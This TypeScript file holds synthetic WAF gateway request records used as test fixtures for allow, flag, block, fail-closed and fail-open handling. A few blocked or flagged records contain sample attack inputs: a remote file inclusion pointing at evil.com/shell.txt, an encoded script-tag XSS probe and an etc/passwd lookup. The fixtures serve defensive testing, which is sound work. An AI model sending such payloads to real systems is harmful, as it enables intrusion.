/**
 * AIShield Milestone 3 Stage B: Deterministic Synthetic Dataset
 * Anchored to UTC Reference Timestamp: 2026-10-04T15:30:00Z.
 * All fixtures adhere to backend contracts in gateway/models.py, gateway/policy.py, and client/contract.py.
 */

import type { RequestRecord } from "../types/telemetry.ts";

export const SYNTHETIC_REFERENCE_TIME = "2026-10-04T15:30:00Z";
export const SYNTHETIC_REFERENCE_TIMESTAMP = new Date(SYNTHETIC_REFERENCE_TIME).getTime();

export const MOCK_REQUESTS: RequestRecord[] = [
  // --- 1. Clean Evaluated Traffic (BLOCKING mode, Allow, Clean) ---
  {
    id: "f9e8d7c6-b5a4-3210-fedc-ba9876543210",
    client_request_id: "req-visitor-001",
    timestamp: "2026-10-04T15:29:45Z",
    method: "GET",
    raw_path: "/api/products",
    query_string: "search=shoes",
    client_ip: "192.168.1.101",
    headers: {
      host: "public-api.customer.com",
      authorization: "[REDACTED]",
      accept: "application/json",
    },
    body_bytes: 0,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "COMPLETED",
    inspection_status: "SUCCESS",
    blocking_score: 0,
    detection_score: 0,
    inspection_latency_ms: 1.2,
    policy_mode: "BLOCKING",
    policy_decision: "ALLOW",
    latency_ms: 2.1,
    upstream_latency_ms: 0.8,
    error_detail: null,
    // Synthetic AI Telemetry Fixture
    ai_status: "OK",
    ai_predicted_category: "BENIGN",
    ai_model_probability: 0.9850,
    ai_class_probabilities: {
      BENIGN: 0.9850,
      SQLI: 0.0050,
      XSS: 0.0050,
      PATH_TRAVERSAL: 0.0050,
    },
    ai_preprocessor_truncated: false,
    ai_token_truncated: false,
    ai_latency_ms: 54.2,
    ai_model_identity: "distilbert/distilbert-base-uncased",
    ai_encoder_revision: "12040accade4e8a0f71eabdb258fecc2e7e948be",
    ai_head_checksum: "da7b3057b0a8ac0d0ee29ca8834924bb88eb00585a84d9a6b128926c5ff3614c",
    ai_policy_mode: "SHADOW",
  },
  {
    id: "e8d7c6b5-a432-10fe-dcba-9876543210fe",
    client_request_id: null,
    timestamp: "2026-10-04T15:27:15Z",
    method: "GET",
    raw_path: "/api/user/profile",
    query_string: null,
    client_ip: "10.0.4.52",
    headers: {
      host: "public-api.customer.com",
      authorization: "[REDACTED]",
      "x-custom-secret": "[REDACTED]",
      accept: "application/json",
    },
    body_bytes: 0,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "COMPLETED",
    inspection_status: "SUCCESS",
    blocking_score: 0,
    detection_score: 1,
    inspection_latency_ms: 1.1,
    policy_mode: "BLOCKING",
    policy_decision: "ALLOW",
    latency_ms: 2.4,
    upstream_latency_ms: 1.2,
    error_detail: null,
  },
  {
    id: "d7c6b5a4-3210-fedc-ba98-76543210fedc",
    client_request_id: "req-visitor-003",
    timestamp: "2026-10-04T15:22:30Z",
    method: "POST",
    raw_path: "/api/cart/items",
    query_string: null,
    client_ip: "192.168.1.105",
    headers: {
      host: "public-api.customer.com",
      authorization: "[REDACTED]",
      "content-type": "application/json",
    },
    body_bytes: 142,
    response_status: 201,
    upstream_status: 201,
    gateway_outcome: "COMPLETED",
    inspection_status: "SUCCESS",
    blocking_score: 0,
    detection_score: 0,
    inspection_latency_ms: 1.5,
    policy_mode: "BLOCKING",
    policy_decision: "ALLOW",
    latency_ms: 3.2,
    upstream_latency_ms: 1.5,
    error_detail: null,
  },

  // --- 2. Flagged Traffic (BLOCKING & FLAGGING modes) ---
  {
    id: "c6b5a432-10fe-dcba-9876-543210fedcba",
    client_request_id: "req-probe-flag-1",
    timestamp: "2026-10-04T15:24:10Z",
    method: "GET",
    raw_path: "/api/search",
    query_string: "q=admin%20login",
    client_ip: "198.51.100.24",
    headers: {
      host: "public-api.customer.com",
      "user-agent": "Mozilla/5.0",
      accept: "application/json",
    },
    body_bytes: 0,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "COMPLETED",
    inspection_status: "SUCCESS",
    blocking_score: 3,
    detection_score: 3,
    inspection_latency_ms: 1.4,
    policy_mode: "BLOCKING",
    policy_decision: "FLAG",
    latency_ms: 2.9,
    upstream_latency_ms: 1.3,
    error_detail: null,
  },
  {
    id: "b5a43210-fedc-ba98-7654-3210fedcba98",
    client_request_id: null,
    timestamp: "2026-10-04T15:17:05Z",
    method: "POST",
    raw_path: "/api/contact",
    query_string: null,
    client_ip: "203.0.113.88",
    headers: {
      host: "public-api.customer.com",
      "content-type": "application/json",
    },
    body_bytes: 380,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "COMPLETED",
    inspection_status: "SUCCESS",
    blocking_score: 2,
    detection_score: 4,
    inspection_latency_ms: 1.6,
    policy_mode: "BLOCKING",
    policy_decision: "FLAG",
    latency_ms: 3.5,
    upstream_latency_ms: 1.7,
    error_detail: null,
  },
  {
    id: "a43210fe-dcba-9876-5432-10fedcba9876",
    client_request_id: "req-flag-mode-only",
    timestamp: "2026-10-04T14:58:20Z",
    method: "POST",
    raw_path: "/api/checkout",
    query_string: null,
    client_ip: "198.51.100.99",
    headers: {
      host: "public-api.customer.com",
      authorization: "[REDACTED]",
      "content-type": "application/json",
    },
    body_bytes: 820,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "COMPLETED",
    inspection_status: "SUCCESS",
    blocking_score: 28, // High score, but in FLAGGING mode, so forwarded!
    detection_score: 30,
    inspection_latency_ms: 2.1,
    policy_mode: "FLAGGING",
    policy_decision: "FLAG",
    latency_ms: 4.8,
    upstream_latency_ms: 2.5,
    error_detail: null,
  },

  // --- 3. Attack Policy Block (BLOCKING mode, HTTP 403, BLOCKED outcome) ---
  {
    id: "a1b2c3d4-e5f6-7890-abcd-ef1234567890",
    client_request_id: "atk-sqli-001",
    timestamp: "2026-10-04T15:30:00Z",
    method: "POST",
    raw_path: "/api/comments",
    query_string: null,
    client_ip: "203.0.113.42",
    headers: {
      host: "public-api.customer.com",
      authorization: "[REDACTED]",
      "x-custom-secret": "[REDACTED]",
      "content-type": "application/json",
    },
    body_bytes: 420,
    response_status: 403,
    upstream_status: null,
    gateway_outcome: "BLOCKED",
    inspection_status: "SUCCESS",
    blocking_score: 40,
    detection_score: 40,
    inspection_latency_ms: 1.8,
    policy_mode: "BLOCKING",
    policy_decision: "BLOCK",
    latency_ms: 2.8,
    upstream_latency_ms: null, // Blocked prior to upstream dispatch
    error_detail: null,
  },
  {
    id: "90ab1234-cdef-5678-90ab-cdef12345678",
    client_request_id: "atk-xss-002",
    timestamp: "2026-10-04T15:19:40Z",
    method: "GET",
    raw_path: "/api/items",
    query_string: "filter=%3Cscript%3Ealert(1)%3C/script%3E",
    client_ip: "198.51.100.15",
    headers: {
      host: "public-api.customer.com",
      "user-agent": "curl/8.1.2",
    },
    body_bytes: 0,
    response_status: 403,
    upstream_status: null,
    gateway_outcome: "BLOCKED",
    inspection_status: "SUCCESS",
    blocking_score: 15,
    detection_score: 15,
    inspection_latency_ms: 1.4,
    policy_mode: "BLOCKING",
    policy_decision: "BLOCK",
    latency_ms: 2.2,
    upstream_latency_ms: null,
    error_detail: null,
  },
  {
    id: "89ab0123-cdef-4567-89ab-cdef01234567",
    client_request_id: null,
    timestamp: "2026-10-04T14:45:10Z",
    method: "POST",
    raw_path: "/api/feedback",
    query_string: null,
    client_ip: "203.0.113.77",
    headers: {
      host: "public-api.customer.com",
      "content-type": "application/x-www-form-urlencoded",
    },
    body_bytes: 250,
    response_status: 403,
    upstream_status: null,
    gateway_outcome: "BLOCKED",
    inspection_status: "SUCCESS",
    blocking_score: 8,
    detection_score: 8,
    inspection_latency_ms: 1.3,
    policy_mode: "BLOCKING",
    policy_decision: "BLOCK",
    latency_ms: 2.0,
    upstream_latency_ms: null,
    error_detail: null,
  },

  // --- 4. Fail-Closed Inspection Failures (GATEWAY_ERROR, HTTP 502, Decision BLOCK, Null Scores) ---
  // Covers all 7 failure statuses per client/contract.py:
  // (1) TIMEOUT
  {
    id: "12345678-90ab-cdef-1234-567890abcdef",
    client_request_id: "err-timeout-01",
    timestamp: "2026-10-04T15:25:00Z",
    method: "POST",
    raw_path: "/api/feedback",
    query_string: null,
    client_ip: "127.0.0.1",
    headers: {
      host: "public-api.customer.com",
      "content-type": "application/json",
    },
    body_bytes: 512,
    response_status: 502,
    upstream_status: null,
    gateway_outcome: "GATEWAY_ERROR",
    inspection_status: "TIMEOUT",
    blocking_score: null, // Null score preserved!
    detection_score: null,
    inspection_latency_ms: 200.0,
    policy_mode: "BLOCKING",
    policy_decision: "BLOCK",
    latency_ms: 200.5,
    upstream_latency_ms: null,
    error_detail: "CRS probe latency exceeded deadline of 200ms",
  },
  // (2) CONNECTION_FAILURE
  {
    id: "23456789-0abc-def1-2345-67890abcdef1",
    client_request_id: "err-conn-refused",
    timestamp: "2026-10-04T15:11:30Z",
    method: "GET",
    raw_path: "/api/orders/pending",
    query_string: null,
    client_ip: "10.0.2.14",
    headers: {
      host: "public-api.customer.com",
      authorization: "[REDACTED]",
    },
    body_bytes: 0,
    response_status: 502,
    upstream_status: null,
    gateway_outcome: "GATEWAY_ERROR",
    inspection_status: "CONNECTION_FAILURE",
    blocking_score: null,
    detection_score: null,
    inspection_latency_ms: 12.5,
    policy_mode: "BLOCKING",
    policy_decision: "BLOCK",
    latency_ms: 13.1,
    upstream_latency_ms: null,
    error_detail: "Connection refused by WAF inspector backend",
  },
  // (3) PARSING_FAILURE
  {
    id: "34567890-abcd-ef12-3456-7890abcdef12",
    client_request_id: null,
    timestamp: "2026-10-04T14:52:10Z",
    method: "POST",
    raw_path: "/api/webhook/events",
    query_string: null,
    client_ip: "198.51.100.33",
    headers: {
      host: "public-api.customer.com",
      "content-type": "application/json",
    },
    body_bytes: 1048,
    response_status: 502,
    upstream_status: null,
    gateway_outcome: "GATEWAY_ERROR",
    inspection_status: "PARSING_FAILURE",
    blocking_score: null,
    detection_score: null,
    inspection_latency_ms: 2.4,
    policy_mode: "BLOCKING",
    policy_decision: "BLOCK",
    latency_ms: 3.1,
    upstream_latency_ms: null,
    error_detail: "Malformed JSON payload rejected by inspection engine parser",
  },
  // (4) UNEXPECTED_STATUS
  {
    id: "4567890a-bcde-f123-4567-890abcdef123",
    client_request_id: null,
    timestamp: "2026-10-04T14:38:45Z",
    method: "POST",
    raw_path: "/api/upload/chunk",
    query_string: null,
    client_ip: "10.0.5.80",
    headers: {
      host: "public-api.customer.com",
      "content-type": "application/octet-stream",
    },
    body_bytes: 2048,
    response_status: 502,
    upstream_status: null,
    gateway_outcome: "GATEWAY_ERROR",
    inspection_status: "UNEXPECTED_STATUS",
    blocking_score: null,
    detection_score: null,
    inspection_latency_ms: 18.2,
    policy_mode: "BLOCKING",
    policy_decision: "BLOCK",
    latency_ms: 19.0,
    upstream_latency_ms: null,
    error_detail: "WAF probe returned unhandled HTTP 500 internal server error",
  },
  // (5) MISSING_METADATA
  {
    id: "567890ab-cdef-1234-5678-90abcdef1234",
    client_request_id: "err-missing-headers",
    timestamp: "2026-10-04T14:15:20Z",
    method: "GET",
    raw_path: "/api/reports/daily",
    query_string: null,
    client_ip: "192.168.1.110",
    headers: {
      host: "public-api.customer.com",
      authorization: "[REDACTED]",
    },
    body_bytes: 0,
    response_status: 502,
    upstream_status: null,
    gateway_outcome: "GATEWAY_ERROR",
    inspection_status: "MISSING_METADATA",
    blocking_score: null,
    detection_score: null,
    inspection_latency_ms: 1.9,
    policy_mode: "BLOCKING",
    policy_decision: "BLOCK",
    latency_ms: 2.6,
    upstream_latency_ms: null,
    error_detail: "WAF response omitted required X-CRS-Blocking-Score header",
  },
  // (6) INVALID_METADATA
  {
    id: "67890abc-def1-2345-6789-0abcdef12345",
    client_request_id: null,
    timestamp: "2026-10-04T13:40:00Z",
    method: "POST",
    raw_path: "/api/payment/authorize",
    query_string: null,
    client_ip: "10.0.1.99",
    headers: {
      host: "public-api.customer.com",
      authorization: "[REDACTED]",
      "content-type": "application/json",
    },
    body_bytes: 310,
    response_status: 502,
    upstream_status: null,
    gateway_outcome: "GATEWAY_ERROR",
    inspection_status: "INVALID_METADATA",
    blocking_score: null,
    detection_score: null,
    inspection_latency_ms: 1.7,
    policy_mode: "BLOCKING",
    policy_decision: "BLOCK",
    latency_ms: 2.5,
    upstream_latency_ms: null,
    error_detail: "Non-integer anomaly score received in X-CRS-Blocking-Score",
  },
  // (7) CONFLICTING_METADATA
  {
    id: "7890abcd-ef12-3456-7890-abcdef123456",
    client_request_id: null,
    timestamp: "2026-10-04T12:10:15Z",
    method: "GET",
    raw_path: "/api/config/client",
    query_string: null,
    client_ip: "192.168.1.120",
    headers: {
      host: "public-api.customer.com",
    },
    body_bytes: 0,
    response_status: 502,
    upstream_status: null,
    gateway_outcome: "GATEWAY_ERROR",
    inspection_status: "CONFLICTING_METADATA",
    blocking_score: null,
    detection_score: null,
    inspection_latency_ms: 1.5,
    policy_mode: "BLOCKING",
    policy_decision: "BLOCK",
    latency_ms: 2.3,
    upstream_latency_ms: null,
    error_detail: "Divergent duplicate headers received for X-CRS-Blocking-Score",
  },

  // --- 5. Fail-Open Inspection Failure (Decision ALLOW, Null Scores, Forwarded) ---
  {
    id: "89012345-bcde-f123-4567-890abcdef123",
    client_request_id: "fail-open-probe-1",
    timestamp: "2026-10-04T15:08:15Z",
    method: "GET",
    raw_path: "/api/catalog/categories",
    query_string: null,
    client_ip: "192.168.1.130",
    headers: {
      host: "public-api.customer.com",
    },
    body_bytes: 0,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "COMPLETED",
    inspection_status: "TIMEOUT",
    blocking_score: null, // Inspection failed, scores null!
    detection_score: null,
    inspection_latency_ms: 200.0,
    policy_mode: "BLOCKING",
    policy_decision: "ALLOW", // Allowed under fail-open directive!
    latency_ms: 215.4,
    upstream_latency_ms: 14.8,
    error_detail: "Fail-open forward after inspector timeout",
  },
  {
    id: "90123456-cdef-1234-5678-90abcdef1234",
    client_request_id: "fail-open-probe-2",
    timestamp: "2026-10-04T14:32:00Z",
    method: "POST",
    raw_path: "/api/notifications/register",
    query_string: null,
    client_ip: "10.0.3.45",
    headers: {
      host: "public-api.customer.com",
      "content-type": "application/json",
    },
    body_bytes: 180,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "COMPLETED",
    inspection_status: "CONNECTION_FAILURE",
    blocking_score: null,
    detection_score: null,
    inspection_latency_ms: 45.2,
    policy_mode: "BLOCKING",
    policy_decision: "ALLOW",
    latency_ms: 55.0,
    upstream_latency_ms: 8.9,
    error_detail: "Fail-open forward after inspector connection refused",
  },

  // --- 6. Special Policy Modes: MONITORING (Allows High-Score Attacks) ---
  {
    id: "01234567-89ab-cdef-0123-456789abcdef",
    client_request_id: "mon-mode-attack",
    timestamp: "2026-10-04T15:15:30Z",
    method: "POST",
    raw_path: "/api/auth/token",
    query_string: null,
    client_ip: "203.0.113.19",
    headers: {
      host: "public-api.customer.com",
      "content-type": "application/x-www-form-urlencoded",
    },
    body_bytes: 280,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "COMPLETED",
    inspection_status: "SUCCESS",
    blocking_score: 35, // High score attack, but ALLOWED because policy_mode is MONITORING!
    detection_score: 35,
    inspection_latency_ms: 1.7,
    policy_mode: "MONITORING",
    policy_decision: "ALLOW", // Proves ALLOW does not mean clean!
    latency_ms: 3.8,
    upstream_latency_ms: 1.9,
    error_detail: null,
  },

  // --- 7. Ingress Rejections (NOT_RUN, Null Policy Fields, REJECTED Outcome) ---
  // (1) 404 Internal unmapped path
  {
    id: "8c7b6a5d-4e3f-2109-8765-43210fedcba9",
    client_request_id: null,
    timestamp: "2026-10-04T15:28:10Z",
    method: "GET",
    raw_path: "/internal/stats",
    query_string: null,
    client_ip: "192.168.1.50",
    headers: {
      host: "public-api.customer.com",
    },
    body_bytes: 0,
    response_status: 404,
    upstream_status: null,
    gateway_outcome: "REJECTED",
    inspection_status: "NOT_RUN",
    blocking_score: null,
    detection_score: null,
    inspection_latency_ms: null,
    policy_mode: null,
    policy_decision: null, // Security policy was NOT evaluated
    latency_ms: 0.4,
    upstream_latency_ms: null,
    error_detail: "Path not found on protected route table",
  },
  // (2) 405 Method rejection
  {
    id: "7b6a5d4e-3f21-0987-6543-210fedcba987",
    client_request_id: "reject-bad-method",
    timestamp: "2026-10-04T15:02:40Z",
    method: "DELETE",
    raw_path: "/api/products/42",
    query_string: null,
    client_ip: "198.51.100.5",
    headers: {
      host: "public-api.customer.com",
    },
    body_bytes: 0,
    response_status: 405,
    upstream_status: null,
    gateway_outcome: "REJECTED",
    inspection_status: "NOT_RUN",
    blocking_score: null,
    detection_score: null,
    inspection_latency_ms: null,
    policy_mode: null,
    policy_decision: null,
    latency_ms: 0.3,
    upstream_latency_ms: null,
    error_detail: "Method DELETE is not permitted on this gateway endpoint",
  },
  // (3) 413 Oversized body rejection
  {
    id: "6a5d4e3f-2109-8765-4321-0fedcba98765",
    client_request_id: null,
    timestamp: "2026-10-04T14:48:00Z",
    method: "POST",
    raw_path: "/api/documents/upload",
    query_string: null,
    client_ip: "203.0.113.60",
    headers: {
      host: "public-api.customer.com",
      "content-length": "10485760",
    },
    body_bytes: 10485760,
    response_status: 413,
    upstream_status: null,
    gateway_outcome: "REJECTED",
    inspection_status: "NOT_RUN",
    blocking_score: null,
    detection_score: null,
    inspection_latency_ms: null,
    policy_mode: null,
    policy_decision: null,
    latency_ms: 0.5,
    upstream_latency_ms: null,
    error_detail: "Request payload exceeded maximum size limit of 1048576 bytes",
  },

  // --- 8. Additional Gateway Outcomes: Stream Errors & Disconnects ---
  {
    id: "5d4e3f21-0987-6543-210f-edcba9876543",
    client_request_id: "client-aborted-stream",
    timestamp: "2026-10-04T15:06:50Z",
    method: "GET",
    raw_path: "/api/export/transactions",
    query_string: "format=csv",
    client_ip: "10.0.6.22",
    headers: {
      host: "public-api.customer.com",
      authorization: "[REDACTED]",
    },
    body_bytes: 0,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "CLIENT_DISCONNECT",
    inspection_status: "SUCCESS",
    blocking_score: 0,
    detection_score: 0,
    inspection_latency_ms: 1.2,
    policy_mode: "BLOCKING",
    policy_decision: "ALLOW",
    latency_ms: 1450.0,
    upstream_latency_ms: 2.1,
    error_detail: "Client disconnected before response streaming completed",
  },
  {
    id: "4e3f2109-8765-4321-0fed-cba987654321",
    client_request_id: "upstream-dropped-conn",
    timestamp: "2026-10-04T14:22:15Z",
    method: "POST",
    raw_path: "/api/sync/batch",
    query_string: null,
    client_ip: "10.0.6.25",
    headers: {
      host: "public-api.customer.com",
      "content-type": "application/json",
    },
    body_bytes: 4500,
    response_status: 502,
    upstream_status: 502,
    gateway_outcome: "UPSTREAM_STREAM_ERROR",
    inspection_status: "SUCCESS",
    blocking_score: 0,
    detection_score: 0,
    inspection_latency_ms: 1.8,
    policy_mode: "BLOCKING",
    policy_decision: "ALLOW",
    latency_ms: 820.0,
    upstream_latency_ms: 3.4,
    error_detail: "Upstream server terminated connection mid-chunk stream",
  },

  // --- 9. Records within 24 Hours Window (Earlier in the day) ---
  {
    id: "3f210987-6543-210f-edcb-a98765432109",
    client_request_id: "req-morning-01",
    timestamp: "2026-10-04T10:15:00Z",
    method: "GET",
    raw_path: "/api/health",
    query_string: null,
    client_ip: "10.0.0.1",
    headers: {
      host: "public-api.customer.com",
    },
    body_bytes: 0,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "COMPLETED",
    inspection_status: "SUCCESS",
    blocking_score: 0,
    detection_score: 0,
    inspection_latency_ms: 0.9,
    policy_mode: "BLOCKING",
    policy_decision: "ALLOW",
    latency_ms: 1.8,
    upstream_latency_ms: 0.7,
    error_detail: null,
  },
  {
    id: "21098765-4321-0fed-cba9-876543210987",
    client_request_id: "atk-morning-rfi",
    timestamp: "2026-10-04T08:30:00Z",
    method: "GET",
    raw_path: "/api/include",
    query_string: "file=http://evil.com/shell.txt",
    client_ip: "198.51.100.200",
    headers: {
      host: "public-api.customer.com",
    },
    body_bytes: 0,
    response_status: 403,
    upstream_status: null,
    gateway_outcome: "BLOCKED",
    inspection_status: "SUCCESS",
    blocking_score: 25,
    detection_score: 25,
    inspection_latency_ms: 1.5,
    policy_mode: "BLOCKING",
    policy_decision: "BLOCK",
    latency_ms: 2.2,
    upstream_latency_ms: null,
    error_detail: null,
  },
  {
    id: "10987654-3210-fedc-ba98-765432109876",
    client_request_id: null,
    timestamp: "2026-10-04T05:00:00Z",
    method: "POST",
    raw_path: "/api/telemetry/heartbeat",
    query_string: null,
    client_ip: "10.0.0.2",
    headers: {
      host: "public-api.customer.com",
      "content-type": "application/json",
    },
    body_bytes: 88,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "COMPLETED",
    inspection_status: "SUCCESS",
    blocking_score: 0,
    detection_score: 0,
    inspection_latency_ms: 1.0,
    policy_mode: "BLOCKING",
    policy_decision: "ALLOW",
    latency_ms: 2.0,
    upstream_latency_ms: 0.9,
    error_detail: null,
  },
  {
    id: "09876543-210f-edcb-a987-654321098765",
    client_request_id: "req-overnight-flag",
    timestamp: "2026-10-03T23:45:00Z",
    method: "GET",
    raw_path: "/api/search",
    query_string: "q=etc%2Fpasswd",
    client_ip: "203.0.113.111",
    headers: {
      host: "public-api.customer.com",
    },
    body_bytes: 0,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "COMPLETED",
    inspection_status: "SUCCESS",
    blocking_score: 3,
    detection_score: 4,
    inspection_latency_ms: 1.3,
    policy_mode: "BLOCKING",
    policy_decision: "FLAG",
    latency_ms: 2.7,
    upstream_latency_ms: 1.2,
    error_detail: null,
  },

  // --- 10. Historical Pre-Milestone 2 Records (NOT_RUN, Null Policy, LEGACY_UNVERIFIED) ---
  {
    id: "a0b1c2d3-e4f5-6789-0123-456789abcdef",
    client_request_id: "legacy-req-001",
    timestamp: "2026-10-02T14:00:00Z",
    method: "GET",
    raw_path: "/api/products",
    query_string: null,
    client_ip: "10.0.1.10",
    headers: {
      host: "public-api.customer.com",
      authorization: "[REDACTED]",
    },
    body_bytes: 0,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "LEGACY_UNVERIFIED",
    inspection_status: "NOT_RUN",
    blocking_score: null, // Null score in historical record
    detection_score: null,
    inspection_latency_ms: null,
    policy_mode: null,
    policy_decision: null, // Policy evaluation did not exist in Milestone 1
    latency_ms: 2.0,
    upstream_latency_ms: 1.2,
    error_detail: null,
  },
  {
    id: "b1c2d3e4-f5a6-7890-1234-56789abcdef0",
    client_request_id: null,
    timestamp: "2026-10-02T10:30:00Z",
    method: "POST",
    raw_path: "/api/checkout",
    query_string: null,
    client_ip: "10.0.1.15",
    headers: {
      host: "public-api.customer.com",
      authorization: "[REDACTED]",
      "content-type": "application/json",
    },
    body_bytes: 540,
    response_status: 200,
    upstream_status: 200,
    gateway_outcome: "LEGACY_UNVERIFIED",
    inspection_status: "NOT_RUN",
    blocking_score: null,
    detection_score: null,
    inspection_latency_ms: null,
    policy_mode: null,
    policy_decision: null,
    latency_ms: 3.5,
    upstream_latency_ms: 2.1,
    error_detail: null,
  },
];
